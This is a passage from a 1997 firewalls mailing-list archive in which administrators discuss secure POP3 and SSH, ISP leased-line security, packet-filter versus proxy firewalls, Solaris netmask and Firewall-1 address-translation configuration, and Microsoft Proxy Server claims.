Secure Pop3? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Try the APOP option.. Granted, it's not much, but it's better than cleartext. Alternatively, if you're into S&M you could kerberize it :-) Or, you could go to something like S/Key or SecurID. -brad On Tue, 3 Jun 1997, Warpy wrote: > Following on in the same thread of my last question, I have seen that one > of the best sources of clear text logins and passwords to be from people > accessing pop3 (while a sniffer is running, in this case "linsniff"). Is > there a secure pop3 "getmail" program available, or a way i can implement > existing secure transfer programs (such as ssh) with *nix based pop3 mail > grabber programs? > > Warpy > > From owner-firewalls-outgoing Tue Jun 3 17:58:46 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id RAA11488 for firewalls-outgoing; Tue, 3 Jun 1997 17:31:57 -0700 (PDT) Received: from sge.net (krystal.sge.net [152.91.9.1]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id RAA11459 for ; Tue, 3 Jun 1997 17:31:47 -0700 (PDT) Received: by sge.net; id KAA10959; Wed, 4 Jun 1997 10:35:23 +1000 (EST) Received: from zirconia.sge.net(10.1.1.6) by krystal.sge.net via smap (3.2) id xma010909; Wed, 4 Jun 97 10:35:00 +1000 Received: by zirconia.sge.net; id KAA24966; Wed, 4 Jun 1997 10:35:00 +1000 (EST) Received: from ns2.dpie.gov.au(152.91.195.1) by zirconia.sge.net via smap (3.2) id xma024855; Wed, 4 Jun 97 10:34:31 +1000 Received: (from news@localhost) by conargo.dpie.gov.au id KAA20586 (8.6.11/IDA-1.6); Wed, 4 Jun 1997 10:34:30 +1000 X-Organisation: Department of Primary Industries and Energy X-Url: http://www.dpie.gov.au/ X-Notice: Views expressed by this message are not necessarily those of the Department of Primary Industries and Energy or of the Government of the Commonwealth of Australia. To: firewalls@greatcircle.com Path: usenet From: Gavin Longmuir Newsgroups: maillist.comp.firewalls Subject: Re: SSH Equiv for FTP? Date: Wed, 04 Jun 1997 10:34:29 +1000 Organization: Commonwealth Department of Primary Industries and Energy http://www.dpie.gov.au/ Lines: 20 Message-ID: <3394B815.6EE1@dpie.gov.au> References: <5n0mn6$74a@conargo.dpie.gov.au> NNTP-Posting-Host: 152.91.194.1 Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-Mailer: Mozilla 3.01 (X11; I; SunOS 5.4 sun4m) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk ArkanoiD wrote: > > nuqneH, > > > > > I was wondering whether there was an equivalent to SSH for ftp. Does > > anyone know if there is? > > > You can use ftp over ssh with port forwarding feature.. > Try rsync using ssh as the transport method. A techinical paper can be found at http://cs.anu.edu.au/techreports/1996/TR-CS-96-05.html Gavin -- Gavin Longmuir - Internet Applications and Platforms Manager Information Management and Services Branch Commonwealth Department of Primary Industries and Energy Voice:+61 6 271 6486 FAX:+61 6 272 4997 mailto:Gavin.Longmuir@dpie.gov.au From owner-firewalls-outgoing Wed Jun 4 01:00:29 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id AAA11070 for firewalls-outgoing; Wed, 4 Jun 1997 00:58:14 -0700 (PDT) Received: from pdx.com.my (pdx.com.my [192.228.144.1]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id AAA11046 for ; Wed, 4 Jun 1997 00:58:04 -0700 (PDT) Received: from wsm.pdx.com.my by pdx.com.my with smtp (Smail3.1.29.1 #3) id m0wZAu3-000BGFC; Wed, 4 Jun 97 15:54 GMT+0800 Message-ID: <3395210C.7EAF@pdx.com.my> Date: Wed, 04 Jun 1997 16:02:20 +0800 From: Wong Organization: CSNet X-Mailer: Mozilla 3.0Gold (Win95; I) MIME-Version: 1.0 To: "Kohn, Joav" , Mariko Yashada CC: firewalls@greatcircle.com Subject: Re: ISP Connection References: <0C673F68C3A0D011A94208002BE526253524@USBGREXCH01> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On 2 June 1997, Kohn, Joav wrote: > > unless you have a screening router (or proxy server, or firewall) at > your end, you have no security at all. just cause the direct route to > your network is hidden doesn't give you any security. if it made it > impossible for the internet to reach you, none of your internet requests > would ever get back to you. > > no matter how you go, ISP or MCI/SPRINT/ATT, you still need to get some > type of protection on your end, under your control. after all, would you > want to bank your company on your internet provider? > > > > On 2 June 1997, Mariko Yashada wrote: > > > > > > > > > My company is currently getting Internet access through a local ISP, using > > > PPP connections. We are now considering replacing the dial-up connections > > > with a leased line to the ISP. We will leave our web server at the ISP and > > > will continue to use their e-mail server. There will be a router at the ISP > > > end of the line. The line will connect to our Enterprise Network through a > > > router at our end. We will also put a proxy server at our end to filter out > > > going access and do NAT. > > > > > > The ISP people say this type of connection is more secure than a direct > > > connection to the Internet through say MCI, becuase our router will be > > > "hidden" behind their routing system. The IP address of our router will not > > > be accessable from outside the ISP domain. > > > > > > We will not allow incomming connections such as telnet or ftp. We will > > > restrict access from inside the company to e-mail, http, ftp and probably > > > audio. > > > > > > My question is, how secure is this type of connection? How difficult is it > > > for someone outside the ISP domain to discover and access our connection? > > > > > > Thanks, > > > > > > Mariko > > > Hi Pals! I agree with what Kohn said in his first paragraph, last line. By the way Kohn, she mentioned that she will be using a proxy server in her first paragraph. 1. Your router is "hidden", because both your router and your ISP's router will not broadcast any routing tables between themselves. This is a normal configuration, since there are so many routers in the Internet, and surely your router cannot store them in its cache. a. You will define a static route (or a default gateway) with the address of your ISP's router and a metric of one in your router, and your ISP also will add a static route in their router to point to your router. Whenever your router receives any packet destined for 0.0.0.0, it will be forwarded to your ISP's router. b. You will disable "talk" and "listen" on your router. So your internal LAN will not be broadcasted to the Internet, and your router will not receive any routing updates. This is why you would have to add a static route in your router. 2. A proxy server alone is not enough to protect your LAN. You will need more than that, for example, a packet filter, an application filter or a full firewall. 3. Anyone can still know your LAN's network address, just by ping-ing your proxy server or DNS (eg. ping grfn.org instead of the normal "ping x.x.x.x"). You can see the IP address in the reply packet (unless you install a firewall and disable the ICMP echo reply function). Regards. Wong. From owner-firewalls-outgoing Wed Jun 4 01:45:28 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id BAA13884 for firewalls-outgoing; Wed, 4 Jun 1997 01:29:47 -0700 (PDT) Received: from dg-rtp.dg.com (dg-rtp.rtp.dg.com [128.222.1.2]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id BAA13810 for ; Wed, 4 Jun 1997 01:29:28 -0700 (PDT) Received: from scorpian.europe.dg.com by dg-rtp.dg.com (5.4R3.10/dg-rtp-v02) id AA16562; Wed, 4 Jun 1997 04:32:50 -0400 Received: from speedy.europe.dg.com by scorpian.europe.dg.com (5.4R3.00/dg-s04) id AA24703; Wed, 4 Jun 1997 09:32:42 +0100 Received: from pcpedro by speedy.europe.dg.com (8.6.13/200.2.1.5) id JAA12778; Wed, 4 Jun 1997 09:32:22 GMT Received: by pcpedro with Microsoft Mail id <01BC70CA.41A88880@pcpedro>; Wed, 4 Jun 1997 09:32:44 +0100 Message-Id: <01BC70CA.41A88880@pcpedro> From: Pedro Salgueiro To: "'Mike Jones'" Cc: "'firewalls'" Subject: RE: PIX and Firewall-1 Date: Wed, 4 Jun 1997 09:29:35 +0100 Mime-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi to all, I've been "watching" the discussion regarding the differences between = packet-filtering and application level firewalls. I believe that there = are some: 1 - Packet filtering firewalls are more difficult to manage (It is very = simple to mis-configure =3D> less secure). It may be very complicated establishing rules. 2 - Packet filter systems are always routing packets (so "fail-open" may = occur). A well known contructor firewall crashed with a ping attack and = routed all the packets from the insecure network to the secure one. 3 - If you are using a packet filter system and you provide SMTP, HTTP, = etc. you cannot control what the users do with those protocols,i.e., you = open or close a port. Application level firewalls provide secure = daemons of those protocols. Regards, Pedro Salgueiro =20 Data General Portugal Tel. +351 - 1 - 4129600 Fax. +351 - 1 - 4129699 mailto:psalgueiro@pt.europe.dg.com R. Dr. Ant=F3nio Loureiro Borges n=BA2 Arquiparque - Miraflores 1495 Alg=E9s Portugal ______________________________________________ "Don't take life too serious no one gets out alive!!!! :-)" * These are my own opinions and do not reflect those of the company * ---------- From: Mike Jones Sent: quarta-feira, 4 de junho de 1997 8:55 To: mfiocchi@otm.it; firewalls@GreatCircle.COM; carlsonp@sprynet.com Subject: Re: PIX and Firewall-1 Peter Carlson writes.... > There are many comparisons made by datacomm, lan times, ziff-davis and > others. Keep in mind that both pix and fw-1 are glorified packet = filters, > even though they have a fancy name for it. I wouyld stick with an > application level gateway. They are well accepted and known for being = more > secure. Many things are known that aren't so. This claim comes by periodically in this forum, and I have yet to get an answer to this question: in=20 whatway are application level gateways more secure than, say, FW-1 or = PIX? There are certainly capabilities that can be provided via application=20 proxies that can't be provided by any filter-based technologies, but = what types of attacks are a FW-1 or a PIX vulnerable to that application proxies aren't? -- Mike Jones Sr. Technology Advisor UNIFIED Technologies From owner-firewalls-outgoing Wed Jun 4 02:00:15 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id BAA14903 for firewalls-outgoing; Wed, 4 Jun 1997 01:41:11 -0700 (PDT) Received: from glacier.wise.edt.ericsson.se (glacier-ext.wise.edt.ericsson.se [193.180.251.38]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id BAA14870 for ; Wed, 4 Jun 1997 01:40:55 -0700 (PDT) Received: from geek (geek.nmac.ericsson.se [130.100.187.83]) by glacier.wise.edt.ericsson.se (8.7.5/8.7.3/glacier-0.9) with ESMTP id KAA16357 for ; Wed, 4 Jun 1997 10:44:14 +0200 (MET DST) Received: from haig.oplab.nmac.ericsson.se (haig.oplab.nmac.ericsson.se [130.100.187.85]) by geek (8.8.5/8.8.5) with ESMTP id IAA27126 for ; Wed, 4 Jun 1997 08:45:53 +0200 Received: by haig.oplab.nmac.ericsson.se with Internet Mail Service (5.0.1457.3) id ; Wed, 4 Jun 1997 10:44:00 +0200 Message-ID: <43BED8177D10D011A69A0800092C15D7011BFA@haig.oplab.nmac.ericsson.se> From: =?iso-8859-1?Q?Robert_St=E5hlbrand?= To: "'Amy (Cremer) Briggs'" Cc: "'firewalls@greatcircle.com'" Subject: RE: Solaris Date: Wed, 4 Jun 1997 10:43:57 +0200 X-Priority: 3 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.0.1457.3) Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I had this problem too and it really is confusing that editing /etc/netmasks doesn't fix it. My way around this was to edit /etc/rc2.d/S72inetsvc with a line that reconfigures the interface like: ifconfig le0 112.140.0.0 netmask 255.255.0.0 broadcast 112.140.255.0 -trailers up I know that this isn't a very cute way to solve the problem but I tried a lot and couldn't think of anything else then to reconfigure the network interface when I booted. Robert St=E5hlbrand Network-, System-responsible NMAC and OPLAB domains. Ericsson Telecom AB Box 333, Fl=F6jelbergsgatan 1C 43124 M=F6lndal Phone number +46 31 7476162 Fax number +46 31 7473777 Email: robert.stahlbrand@nmac.ericsson.se =20 > -----Original Message----- > From: Amy (Cremer) Briggs [SMTP:amyc@libofmich.lib.mi.us] > Sent: den 3 juni 1997 23:17 > To: firewalls@GreatCircle.COM > Subject: Solaris=20 >=20 > First of all if there is a better list to post this to please let me > know. =20 > I've checked out Suns web site and didn't find any mention of a > Solaris=20 > listserv. >=20 > Does anyone know how can you trick a Solaris box into=20 > treating a class C address as a class B. For example we want to use=20 > 2xx.xx.0.0 as a class B address. I've entered the class B subnetmask > for=20 > this network in the /etc/netmasks file which is how I thought you > could do it=20 > but it isn't working for me. It still thinks its a class C address > and won't=20 > route properly if I set up my routes using it as a class B address. > Finding a way to make this work would save me hours of time because I = > have 5 full class B(Technically class C) networks to do this for and=20 > entering all the class C's within all 5 class B's would take me = awhile > as=20 > well as complicate my routing table. =20 >=20 > Thanks for any help or information you can give me. >=20 > Amy >=20 > \\\\\\\\\\\\\\Amy Briggs Microcomputer Support > Specialist/////////////// > Library of Michigan amyc@libofmich.lib.mi.us=09 > = \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\/////////////////////////////////// > ///////// > ** Its not what you've got, its what you give--TESLA ** >=20 >=20 >=20 >=20 >=20 >=20 >=20 >=20 From owner-firewalls-outgoing Wed Jun 4 04:00:20 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id DAA00408 for firewalls-outgoing; Wed, 4 Jun 1997 03:58:29 -0700 (PDT) Received: from reflections.eng.mindspring.net (reflections.eng.mindspring.net [207.69.183.9]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id DAA00394 for ; Wed, 4 Jun 1997 03:58:18 -0700 (PDT) Received: (qmail 1753 invoked by uid 514); 4 Jun 1997 11:01:59 -0000 Date: Wed, 4 Jun 1997 07:01:59 -0400 (EDT) From: Todd Graham Lewis To: Joe Klemmer cc: firewalls@GreatCircle.COM Subject: Re: ipfwadm question (and procmailrc test) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Mon, 2 Jun 1997, Joe Klemmer wrote: > > I will be setting up a FW using RH Linux and ipfwadm (mainly > because there's no funding to pay for a commercial product) FWIW, we do have funding for a commercial product and we're using ipfwadm anyway. > and I have one > quick question. It's more related to the physical setup of the FW in > that, if I'm not mistaken, I'd need to put the FW PC physically in front of > all the nodes in the LAN, right? IOW, it should look like this: (...) Right. The key point is that you want a single choke point where you can actually _enforce_ your rules about what gets into and what leaves your network. If your firewall isn't the only point of entry for your network, then you can't guarantee this. (It is possible to secure a network using firewalls without enploying this sort of chokepoint model, but the complexities are much greater, as are the possibilities for fucking it up; non-chokepoint firewall setups can only approach chokepoint firewalls in security and, imo, never pass them). Making the firewall a true chokepoint is a simplifying move which makes implementing your policy much, much easier. Just so you're clear on what a chokepoint means in this context, here's what the physical layout of the network looks like: ------------ ---------------------- --------- ---------------------- | Internet |---| Ethernet connected |---| Linux |---| Internet, protected| | |---| to the Internet |---| Box |---| ethernet | ------------ ---------------------- --------- ---------------------- Notice that the only way the internal, protected ethernet can get data to the Internet is through your Linux firewall. Because of this, if you decide, e.g., that no TCP traffic on port 23 will get through your Linux box, then the internal network cannot exchange data over port 23 with the outside world, period. This is the foundation of a firewall. > I know this is in the FW books (Cheswick's and Chapman's) but I haven't > had time to go into them much. This is really more a sticking point in my > brain, I guess. I need a better visualization of this whole thing. Hopefully this was it. If you need more pointers, feel free to contact me in private email or ask the list. -- Todd Graham Lewis MindSpring Enterprises tlewis@mindspring.com From owner-firewalls-outgoing Wed Jun 4 04:30:11 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id EAA02929 for firewalls-outgoing; Wed, 4 Jun 1997 04:26:16 -0700 (PDT) Received: from mail.gestronic.ch ([193.246.62.65]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id EAA02823 for ; Wed, 4 Jun 1997 04:25:41 -0700 (PDT) Received: from raymond_nt4 (sleiman.gestronic.ch [193.246.62.100]) by mail.gestronic.ch (8.8.5/8.8.5) with ESMTP id NAA00837; Wed, 4 Jun 1997 13:24:39 +0200 (MET DST) Message-ID: <33955741.5A7980ED@gestronic.ch> Date: Wed, 04 Jun 1997 13:53:38 +0200 From: Raymond Sleiman X-Mailer: Mozilla 4.0b5 [en] (WinNT; I) MIME-Version: 1.0 To: "fw-1-mailinglist@us.checkpoint.com" , "firewalls@GreatCircle.COM" Subject: Address Translation with Firewall 2.1 on Solaris 2.5.1 X-Priority: 3 (Normal) Content-Type: text/plain; charset=iso-8859-1 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello, I defined address translation on a firewall gateway as fellow: 193.246.62.140 193.246.62.140 DST_STATIC 195.176.150.10 195.176.150.10 195.176.150.10 SRC_STATIC 193.246.62.140 I add with arp -s 195.176.150.10 ehternet_address of the machine 193.246.62.10 PUB. I also defines staic routes to 193.246.62.140 using the internal interface of the firewall. route add 195.176.150.10 Ipaddress of the internal interface 193.246.62.2 The internal interface has 193.246.62.2 as IP address. The external interface has 195.176.150.2 as IP address This address in registered address. the class 195.176.150.0 is a registeres class the class 193.246.62.0 is not a registered address. Adresses are samples and not reality. The problem: i am not able to ping the translated address 195.176.150.10 from the internet and from the inside and from the gateway itself. Could someone tell me what is wrong ? Another question: where we should define address translation. How to load address translation table ( xlate.conf ) ? DO we have to lunch a command to load address translation configuration ? is static routes are correct ? Best regards Raymond Sleiman From owner-firewalls-outgoing Wed Jun 4 05:22:11 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id FAA07002 for firewalls-outgoing; Wed, 4 Jun 1997 05:05:44 -0700 (PDT) Received: from relay.mnsinc.com (relay1.mnsinc.com [206.55.3.25]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id FAA06986 for ; Wed, 4 Jun 1997 05:05:23 -0700 (PDT) Received: from snowball.webtrek.com (klemmerj@snowball.webtrek.com [206.239.36.10]) by relay.mnsinc.com (8.8.5/8.7.3) with SMTP id IAA13803 for ; Wed, 4 Jun 1997 08:09:07 -0400 (EDT) Date: Wed, 4 Jun 1997 08:09:15 -0400 (EDT) From: Joe Klemmer Reply-To: klemmerj@webtrek.com cc: firewalls@GreatCircle.COM Subject: Re: ipfwadm question (and procmailrc test) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 4 Jun 1997, Todd Graham Lewis wrote: > Hopefully this was it. If you need more pointers, feel free to contact me > in private email or ask the list. That was definitely "it". I figured this was how it should look but it's nice to get a clear picture of things. Now it's on to finding someone who has the slightest clue of the physical layout of the network. --- "It's a damn poor mind that can only think of one way to spell a word." -- Andrew Jackson From owner-firewalls-outgoing Wed Jun 4 05:45:27 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id FAA07177 for firewalls-outgoing; Wed, 4 Jun 1997 05:10:35 -0700 (PDT) Received: from sunphil ([208.142.163.65]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id FAA07143 for ; Wed, 4 Jun 1997 05:09:40 -0700 (PDT) Received: by sunphil (SMI-8.6/SMI-SVR4) id UAA00805; Wed, 4 Jun 1997 20:08:16 -0800 Date: Wed, 4 Jun 1997 20:08:16 -0800 From: drexx@pspi.com.ph (Drexx Laggui) Message-Id: <199706050408.UAA00805@sunphil> To: Boonchai.p@cdg.co.th, fw-1-mailinglist@us.checkpoint.com, firewalls@greatcircle.com Subject: Re: [FW1] FW-1 compare with Alta Vista Firewall X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk |> From: Boonchai Pattanatananon |> |> Date: Tue, 3 Jun 1997 20:23:02 +-700 |> |> Hello folks, |> |> Who has comparison of FW-1 3.x with Alta Vista Firewall. |> Please sned it to me. |> Hello Boonchai, Try this: http://www.data.com/lab_tests/firewalls97.html Ciao, Drexx. .: This e-mail is made from 100% recycled electrons :. ~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~ ______ /_____/\ DEXTER D. LAGGUI /_____\\ \ Systems Engineer, Systems Integration Group /_____\ \\ / PHILIPPINE SYSTEMS PRODUCTS INC. /_____/ \/ / / Penthouse, Corporate Business Center /_____/ / \//\ 150 Paseo de Roxas Ave., Legaspi Village \_____\//\ / / Makati City, Philippines \_____/ / /\ / \_____/ \\ \ Phone: (++ 63-2) 813-6453 to 55 loc. 222 \_____\ \\ Fax : (++ 63-2) 813-3516 \_____\/ Email: drexx@pspi.com.ph Pager: (++ 63-2) 1277-33615 ~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~ From owner-firewalls-outgoing Wed Jun 4 06:00:24 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id FAA08744 for firewalls-outgoing; Wed, 4 Jun 1997 05:50:32 -0700 (PDT) Received: from ..southconn.com (southconn.com [199.190.99.2]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id FAA08737 for ; Wed, 4 Jun 1997 05:50:24 -0700 (PDT) X-ROUTED: Wed, 4 Jun 1997 08:51:22 -0500 X-TCP-IDENTITY: Bryant Received: from bryant.southconn.com [199.190.99.21] by ..southconn.com with smtp id AIDCCLAF ; Wed, 4 Jun 1997 08:50:42 -0500 Message-ID: <33959035.42BD@southconn.com> Date: Wed, 04 Jun 1997 08:56:37 -0700 From: Gary Bryant X-Mailer: Mozilla 2.0 (Win95; U) MIME-Version: 1.0 To: Firewalls@GreatCircle.COM Subject: What is SSH ? References: <199706040800.BAA11243@honor.greatcircle.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Forgive my ignorance but (I am new to this firewall stuff)what is SSH? Gary Bryant From owner-firewalls-outgoing Wed Jun 4 06:16:15 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id GAA10492 for firewalls-outgoing; Wed, 4 Jun 1997 06:11:35 -0700 (PDT) Received: from ACML.COM (gtwy1.acml.com [207.140.173.10]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id GAA10473 for ; Wed, 4 Jun 1997 06:11:23 -0700 (PDT) From: John_Chen@ACML.COM Received: from smtpmta.acml.com by ACML.COM (SMI-8.6/SMI-SVR4) id JAA13019; Wed, 4 Jun 1997 09:14:27 -0400 Received: by smtpmta.acml.com(Lotus SMTP MTA v1.05 (305.3 1-15-1997)) id 852564AC.0042EB62 ; Wed, 4 Jun 1997 08:10:56 -0400 X-Lotus-FromDomain: ALLIANCE CAPITAL @ ACML To: sleiman@gestronic.ch cc: Fw-1-Mailinglist@Us.Checkpoint.Com, Firewalls@Greatcircle.Com Message-ID: <852564AC.0049D14D.00@smtpmta.acml.com> Date: Wed, 4 Jun 1997 09:29:09 -0400 Subject: Re: Address Translation with Firewall 2.1 on Solaris 2.5.1 Mime-Version: 1.0 Content-type: text/plain; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk John Chen @ ALLIANCE CAPITAL 06-04-97 09:29 AM Be aware of hte NAT for which interface or both, for your problem, define outsite interface will be better. sleiman @ gestronic.ch on 04/06/97 07:53:38 To: fw-1-mailinglist @ us.checkpoint.com, firewalls @ GreatCircle.COM cc: (bcc: John Chen/New York/ACMC) Subject: Address Translation with Firewall 2.1 on Solaris 2.5.1 Hello, I defined address translation on a firewall gateway as fellow: 193.246.62.140 193.246.62.140 DST_STATIC 195.176.150.10 195.176.150.10 195.176.150.10 SRC_STATIC 193.246.62.140 I add with arp -s 195.176.150.10 ehternet_address of the machine 193.246.62.10 PUB. I also defines staic routes to 193.246.62.140 using the internal interface of the firewall. route add 195.176.150.10 Ipaddress of the internal interface 193.246.62.2 The internal interface has 193.246.62.2 as IP address. The external interface has 195.176.150.2 as IP address This address in registered address. the class 195.176.150.0 is a registeres class the class 193.246.62.0 is not a registered address. Adresses are samples and not reality. The problem: i am not able to ping the translated address 195.176.150.10 from the internet and from the inside and from the gateway itself. Could someone tell me what is wrong ? Another question: where we should define address translation. How to load address translation table ( xlate.conf ) ? DO we have to lunch a command to load address translation configuration ? is static routes are correct ? Best regards Raymond Sleiman From owner-firewalls-outgoing Wed Jun 4 07:42:58 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id FAA09093 for firewalls-outgoing; Wed, 4 Jun 1997 05:55:14 -0700 (PDT) Received: from pdx.com.my (pdx.com.my [192.228.144.1]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id FAA09073 for ; Wed, 4 Jun 1997 05:55:01 -0700 (PDT) Received: from wsm.pdx.com.my by pdx.com.my with smtp (Smail3.1.29.1 #3) id m0wZFX4-000BGWC; Wed, 4 Jun 97 20:51 GMT+0800 Message-ID: <33956691.57F6@pdx.com.my> Date: Wed, 04 Jun 1997 20:58:57 +0800 From: Wong Organization: CSNet X-Mailer: Mozilla 3.0Gold (Win95; I) MIME-Version: 1.0 To: Daniel_Yamaguchi@iscci.com, Jan Guldentops , "Jeremy D. Zawodny" CC: firewalls@greatcircle.com Subject: Re: Microsoft Proxy Server References: <882564A1.00018A6A.00@isc_domino.iscci.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On 23 May 1997, Daniel_Yamaguchi@iscci.com wrote: > > All About MickySoft Proxy Server > > Security (...???) > > Microsoft's Proxy Server was subjected to extensive security testing and > evaluation from independent testing agency, Coopers & Lybrand's Information > Technology Security Services and is resistant to common attacks such as "IP > Spoofing", 'SATAN", and "ISS." > C & L is an accounting and consulting firm (correct me if I'm wrong). What do they know about TCP/IP ports, filters (packet-level, application-level), encryption etc ? They might talk about this and that, but do they know how to configure a proxy server or a firewall ? > > Manageability & Ease of Use > > Integrated with NT User Directory Services, Microsoft Proxy Server allows: > Directory Service? Are you sure? Using NOVELL NDS or BANYAN Streetalk ? Or LDAP? > > Easy Administration provided by a clean, easy to understand and easy to > administer interface. > How do you administer multiple servers? And they are spread nation-wide? Unless you are running NetWare 4.x or Banyan. > > Remote Administration via Internet Service Manager allows Microsoft Proxy > Server to be managed from any Windows NT system on the network. > I thought only NetWare have a utility called "rconsole" ? > > Web Proxy > > Multi-Platform Support - The Web Proxy Server supports all platforms > including: > Windows NT Server > Windows NT Workstation > Windows '95 > Windows for Workgroups/Win 3.1 > UNIX > Macintosh Does IE run on Macintosh or UNIX? NETSCAPE Navigator can. > > Network Compatibility > > One of the best features of Microsoft Proxy Server is the use of WinSock > Proxy to seamlessly provide a gateway between an administrator's existing > IPX network infrastructure and IP-based network services. > At the moment, only NOVELL IntranetWare and CISCO IPeXchange have such a feature. > > Integrates with NT network security domain model - Microsoft Proxy Server > extensively leverages the network-based Windows NT domain security model to > manage access permission and logging. > You must use "Trust" to connect those domains together. And, the "Trust" can be compromised to make the NT trust anybody. Sounds scary . . . .! > > Massive Scalability - Microsoft Proxy Server's cache is limited only by > Windows NY Server system resources. > Can NT scale up to 64 processors, like the SUN servers? Or 12 processors, like the Alpha servers. > Well guys, this is normal MickySoft marketing hype. On 24 May 1997, Jan wrote: >Let's put the record straight: if you are running MS-machines you'll need a >complete firewall to shield it all off. Or you can believe all the >marketing hype and leave your network completely open.... I agree with what you said. >At 01:39 AM 5/24/97 -0400, Todd Graham Lewis wrote: >>On Fri, 23 May 1997 Daniel_Yamaguchi@iscci.com wrote: >> >>> We, at ISC Computers & Communications, Inc. feel that this solution will >>> meet your current needs regarding Internet Security. >> >>I, at 1025 Greenwood Avenue Apartment 3 in Atlanta, do not. >Great... *Why not?* You can scroll-up to know why, Jeremy. Regards. Wong From owner-firewalls-outgoing Wed Jun 4 07:52:03 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id GAA13008 for firewalls-outgoing; Wed, 4 Jun 1997 06:29:54 -0700 (PDT) Received: from cbu.pvtnet.cz (cbu.pvtnet.cz [194.149.105.18]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id GAA12977 for ; Wed, 4 Jun 1997 06:29:43 -0700 (PDT) Received: from snajdr.pvt.net (snajdr.pvt.net [194.149.103.204]) by cbu.pvtnet.cz (8.8.5/8.7.3) with SMTP id PAA14082; Wed, 4 Jun 1997 15:38:56 +0200 (MET DST) Message-ID: <33956E4A.6590018C@pvt.net> Date: Wed, 04 Jun 1997 15:31:54 +0200 From: Petr Snajdr X-Mailer: Mozilla 3.01 (X11; I; Linux 2.0.30 i586) MIME-Version: 1.0 To: Gary Bryant CC: Firewalls@GreatCircle.COM Subject: Re: What is SSH ? References: <199706040800.BAA11243@honor.greatcircle.com> <33959035.42BD@southconn.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Gary Bryant wrote: > > Forgive my ignorance but (I am new to this firewall stuff)what is SSH? > > Gary Bryant Ssh (Secure Shell) is a program to log into another computer over a network, to execute commands in a remote machine, and to move files from one machine to another. It provides strong authentication and secure communications over insecure channels. See: http://www.cs.hut.fi/ssh/ -- Petr Snajdr From owner-firewalls-outgoing Wed Jun 4 07:56:43 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id HAA20772 for firewalls-outgoing; Wed, 4 Jun 1997 07:38:09 -0700 (PDT) Received: from dskfw1.funb.com ([205.152.122.10]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id HAA20736 for ; Wed, 4 Jun 1997 07:37:58 -0700 (PDT) Received: (from uucp@localhost) by dskfw1.funb.com (8.8.5/8.8.5) id KAA25019; Wed, 4 Jun 1997 10:41:40 -0400 (EDT) Received: from cm_mailhost.capmark.funb.com(168.175.82.50) by dskfw1.funb.com via smap (3.2) id xma025006; Wed, 4 Jun 97 10:41:21 -0400 Received: from funws302.capmark.funb.com (funws302 [168.175.7.54]) by cm_mailhost.capmark.funb.com (8.7.5/8.7.3) with ESMTP id KAA10177; Wed, 4 Jun 1997 10:41:19 